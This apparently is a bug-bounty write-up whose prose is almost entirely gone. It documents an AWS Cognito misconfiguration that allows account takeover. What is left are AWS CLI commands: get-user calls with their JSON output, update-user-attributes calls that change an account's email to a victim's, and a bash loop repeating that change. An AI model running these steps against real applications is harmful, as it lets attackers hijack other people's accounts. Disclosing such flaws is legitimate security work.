ATO without any interaction [aws cognito misconfiguration]

About AWS cognito :

AWS cognito flow
$ aws cognito-idp get-user --region us-west-2 --access-token <token>
$ aws cognito-idp get-user --region us-west-2 --access-token <token>{
"Username": "3b84472e-5b44-4d9e-bbea-a49592b8e162",
"UserAttributes": [
{
"Name": "sub",
"Value": "3b84472e-5b44-4d9e-bbea-a49592b8e162"
},
{
"Name": "email_verified",
"Value": "true"
},
{
"Name": "email",
"Value": "shreyaskoli165@gmail.com"
}
]
}
$ aws cognito-idp get-user --region us-west-2 --access-token <token>{
"Username": "google_107427578229077464095",
"UserAttributes": [
{
"Name": "sub",
"Value": "0080f3d4-2173-469f-a929-8a67225d446c"
},
{
"Name": "identities",
"Value": "[{\"userId\":\"107427578229077464095\",\"providerName\":\"Google\",\"providerType\":\"Google\",\"issuer\":null,\"primary\":true,\"dateCreated\":1651166579396}]"
},
{
"Name": "email_verified",
"Value": "true"
},
{
"Name": "given_name",
"Value": "Shreyas"
},
{
"Name": "family_name",
"Value": "Koli"
},
{
"Name": "email",
"Value": "shreyaskoli165@gmail.com"
}
]
}
$ aws cognito-idp update-user-attributes --region us-west-2 --user-attributes 'Name=email,Value=victimsemail@gmail.com' --access-token [access token]{
"CodeDeliveryDetailsList": [
{
"Destination": "v***@g***",
"DeliveryMedium": "EMAIL",
"AttributeName": "email"
}
]
}
Error popup
get-user request
$ aws cognito-idp update-user-attributes --region us-west-2 --user-attributes 'Name=email,Value=victimsemail@gmail.com' --access-token [access token]
#!/bin/bash
for i in {1..100}
do
echo "$i]"
aws cognito-idp update-user-attributes --region us-west-2 --user- attributes "Name=email,Value=victimemail+$i@gmail.com" --access-token [token here]
done

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store